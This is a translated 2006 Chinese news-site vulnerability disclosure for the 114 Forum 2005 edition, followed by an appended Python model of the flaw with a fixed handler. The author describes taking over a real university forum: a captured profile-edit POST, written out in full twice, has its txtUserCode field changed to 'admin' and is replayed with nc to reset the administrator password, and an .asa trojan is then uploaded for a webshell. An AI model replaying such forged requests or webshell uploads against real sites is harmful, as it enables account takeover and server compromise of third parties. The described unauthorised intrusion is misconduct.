
Vulnerability disclosure: 114 Forum 2005 official edition vulnerability (1)


http://www.sina.com.cn 10 April 2006 05:29 Source: 赛迪网

  Vulnerability description:

  Affected product: 114 Forum, 2005 official edition

  /edituserdb.asp

  Lacks validation of the submitted data and of cookies

  As a result, any user can change the administrator's password

  Default admin backend: admin/index.asp

  I tried it out today while attacking a machine in a hosting room through a neighbouring site on the same server (旁注).

  http://www.***.net.cn/xzl/BBS/index.asp

  A forum on the website of ** Medical University.

  I registered a user, 33221.

  Then I went to /edituserdb.asp, clicked "Edit Registration" (修改注册) and started capturing packets!

  The captured content, saved in Notepad, is as follows:

  -----------------------------------------------------------------------------------------------------------

  POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

  Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

  Accept-Language: zh-cn

  Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

  Accept-Encoding: gzip, deflate

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

  Host: www.***.net.cn

  Content-Length: 2304

  Connection: Keep-Alive

  Cache-Control: no-cache

  Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserCode"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtConfirmPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtQuestion"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAnswer"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserName"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="selSex"

  先生

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtNick"

  11

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtProvince"

  111

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAddress"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPostCode"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTel"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtMobile"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtFax"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtEmail"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUrl"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtfile"; filename=""

  Content-Type: application/octet-stream

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtOicq"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtDocument"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="submit"

  修改注册信息

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtId"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTempId"

  -----------------------------7d61e41d605f6--

  -----------------------------------------------------------------------------------------------------------

  Of this, the part “

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserCode"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtConfirmPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtQuestion"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAnswer"

  33221

  -----------------------------7d61e41d605f6

  ”

  Change the first "33221" to “admin” and save the text as 11.txt:

  POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

  Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

  Accept-Language: zh-cn

  Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

  Accept-Encoding: gzip, deflate

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

  Host: www.***.net.cn

  Content-Length: 2304

  Connection: Keep-Alive

  Cache-Control: no-cache

  Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserCode"

  admin

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtConfirmPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtQuestion"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAnswer"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserName"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="selSex"

  先生

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtNick"

  11

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtProvince"

  111

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAddress"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPostCode"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTel"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtMobile"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtFax"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtEmail"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUrl"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtfile"; filename=""

  Content-Type: application/octet-stream

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtOicq"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtDocument"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="submit"

  修改注册信息

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtId"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTempId"

  -----------------------------7d61e41d605f6--

  Because the username I registered, 33221, is the same length as admin, the byte length does not need to be modified here.

  Then submit it to the server with nc:

  nc www.***.net.cn 80 <11.txt

  It returned a message saying the member profile was modified successfully.

  Then log in as admin, using the same password as the one chosen when registering 33221.

  Naturally that gives administrator privileges; then log into the backend, click "Edit Sections" (修改栏目), upload an .asa trojan, and OK, got a webshell.

  I had a look: no patch has been released for this forum system yet, so a large batch of webshells could be taken, but I only took the one server that was fairly useful to me and did not go after the others.
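The flaw described above (the account-edit handler trusting the txtUserCode field instead of the logged-in session) modelled in Python, as an added example that is not code from the advisory or from the 114 forum product: a minimal parser for the captured multipart/form-data shape, the vulnerable save logic beside a session-bound version, and a replay of the forged field against both. The BOUNDARY value, the user table, the session dictionary and the function names are constructed assumptions.

```python
import re

BOUNDARY = "---------------------------7d61e41d605f6"   # constructed, mirrors the capture
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY

def parse_multipart(content_type: str, body: bytes) -> dict:
    # Minimal multipart/form-data parser: returns {field name: text value}
    boundary = re.search(r"boundary=(.+)$", content_type).group(1).strip()
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble or the closing "--" marker
            continue
        headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', headers)
        if name:
            fields[name.group(1).decode()] = value.decode("utf-8", "replace")
    return fields

def save_user_account_vulnerable(fields: dict, users: dict) -> str:
    # The flaw the advisory describes: the account to update is read from the form
    target = fields["txtUserCode"]
    users[target]["password"] = fields["txtPassword"]
    return target

def save_user_account_fixed(session: dict, fields: dict, users: dict) -> bool:
    # Hardened: the account comes from the server-side session, never from txtUserCode
    target = session["user_code"]
    if fields.get("txtUserCode") != target:    # forged account field: reject (and log it)
        return False
    if fields.get("txtPassword") != fields.get("txtConfirmPassword"):
        return False
    users[target]["password"] = fields["txtPassword"]   # production code would hash this
    return True

def build_body(values: dict) -> bytes:
    # Constructed request body in the shape of the captured POST
    parts = "".join(f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
                    for n, v in values.items())
    return (parts + f"--{BOUNDARY}--\r\n").encode()

def demo() -> tuple:
    # Replays the forged txtUserCode against both handlers (session belongs to user 33221)
    fields = parse_multipart(CONTENT_TYPE, build_body(
        {"txtUserCode": "admin", "txtPassword": "33221", "txtConfirmPassword": "33221"}))
    fresh = lambda: {"admin": {"password": "secret"}, "33221": {"password": "33221"}}
    vuln_users, fixed_users = fresh(), fresh()
    save_user_account_vulnerable(fields, vuln_users)
    accepted = save_user_account_fixed({"user_code": "33221"}, fields, fixed_users)
    return vuln_users["admin"]["password"], fixed_users["admin"]["password"], accepted
```

`demo()` shows the vulnerable handler overwriting admin's password with the value 33221 supplied, while the session-bound handler rejects the request and leaves it untouched.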
